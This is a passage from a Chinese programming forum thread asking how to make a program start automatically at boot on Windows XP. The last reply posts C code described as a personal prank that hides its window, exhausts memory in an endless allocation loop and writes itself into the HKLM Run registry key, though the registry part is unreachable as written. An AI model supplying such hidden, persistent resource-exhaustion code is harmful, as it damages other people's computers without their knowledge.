| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2504 人关注过本帖
标题:开机自启动!重金求解!
只看楼主 加入收藏
laoyang103
Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19
来 自:内蒙古包头
等 级:贵宾
威 望:19
帖 子:3082
专家分:11056
注 册:2010-5-22
收藏
得分:0 
XP真的可以?

                                         
===========深入<----------------->浅出============
2011-04-11 21:27
瓦药墙
Rank: 7Rank: 7Rank: 7
等 级:黑侠
帖 子:218
专家分:556
注 册:2009-9-16
收藏
得分:0 
恩, 可以的, 可能, 你复制的时候, 没把它的属性改改? 系统属性的文件夹CopyFile会失败
2011-04-11 21:30
啊C
Rank: 3Rank: 3
等 级:论坛游侠
帖 子:84
专家分:177
注 册:2010-6-24
收藏
得分:0 
才放学,这个方法可以的,以前我也做了个,XP测试能性,买新电脑了,老电脑送给女朋友了,所以你让我给代码,我又要编辑!
为什么用注册表了,是不会吗!上面方法做病毒也太明显了!

亲爱的朋友们动起手来吧,让我们一起迈向C语言的世界!
2011-04-11 21:52
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif



# include <stdio.h>
# include <malloc.h>

#include <windows.h>
 
    int main(void)
        
{
while(1)
{
    int *b =(int *) malloc(100000000);
}
return 0;


   
    TCHAR szPath[MAX_PATH];

 
    GetModuleFileName(NULL,
                      szPath,
                      MAX_PATH);

 
   
    HKEY newValue;
 
   

               RegOpenKey(HKEY_LOCAL_MACHINE,
               "Software\\Microsoft\\Windows\\CurrentVersion\\Run",

               &newValue);
               RegSetValueEx(newValue,
                  "Name_Me_Please",
                  0,

                  REG_SZ,
                  (LPBYTE)szPath,
                  sizeof(szPath));
     RegCloseKey(newValue);
     return 0;
    }
看看不知道对你有没有用!自己的一个恶作剧
2012-05-19 16:34
快速回复:开机自启动!重金求解!
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.010860 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved